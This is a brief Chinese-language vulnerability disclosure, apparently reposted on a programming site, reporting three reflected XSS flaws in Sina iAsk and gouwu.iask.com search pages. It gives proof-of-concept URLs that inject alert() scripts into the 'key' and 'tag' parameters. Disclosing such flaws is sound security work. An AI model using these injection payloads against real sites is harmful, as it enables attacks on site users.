新浪爱问和购物的三个没营养的XSS - 网站安全

简要描述：影响不大and没营养的一个xss

漏洞证明：

爱问：http://ishare.iask.sina.com.cn/search.php?key=<script>alert("蚊虫!")</script>

http://iask.sina.com.cn/search_engine/search_knowledge_engine.php?key=蚊虫&tag="</a><script>alert()</script> <br />

购物：http://gouwu.iask.com/search.php?key=<script>alert("蚊虫!")</script>

修复方案：

扣开发人员工资

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11685

更新时间：2022-09-13 阅读：46次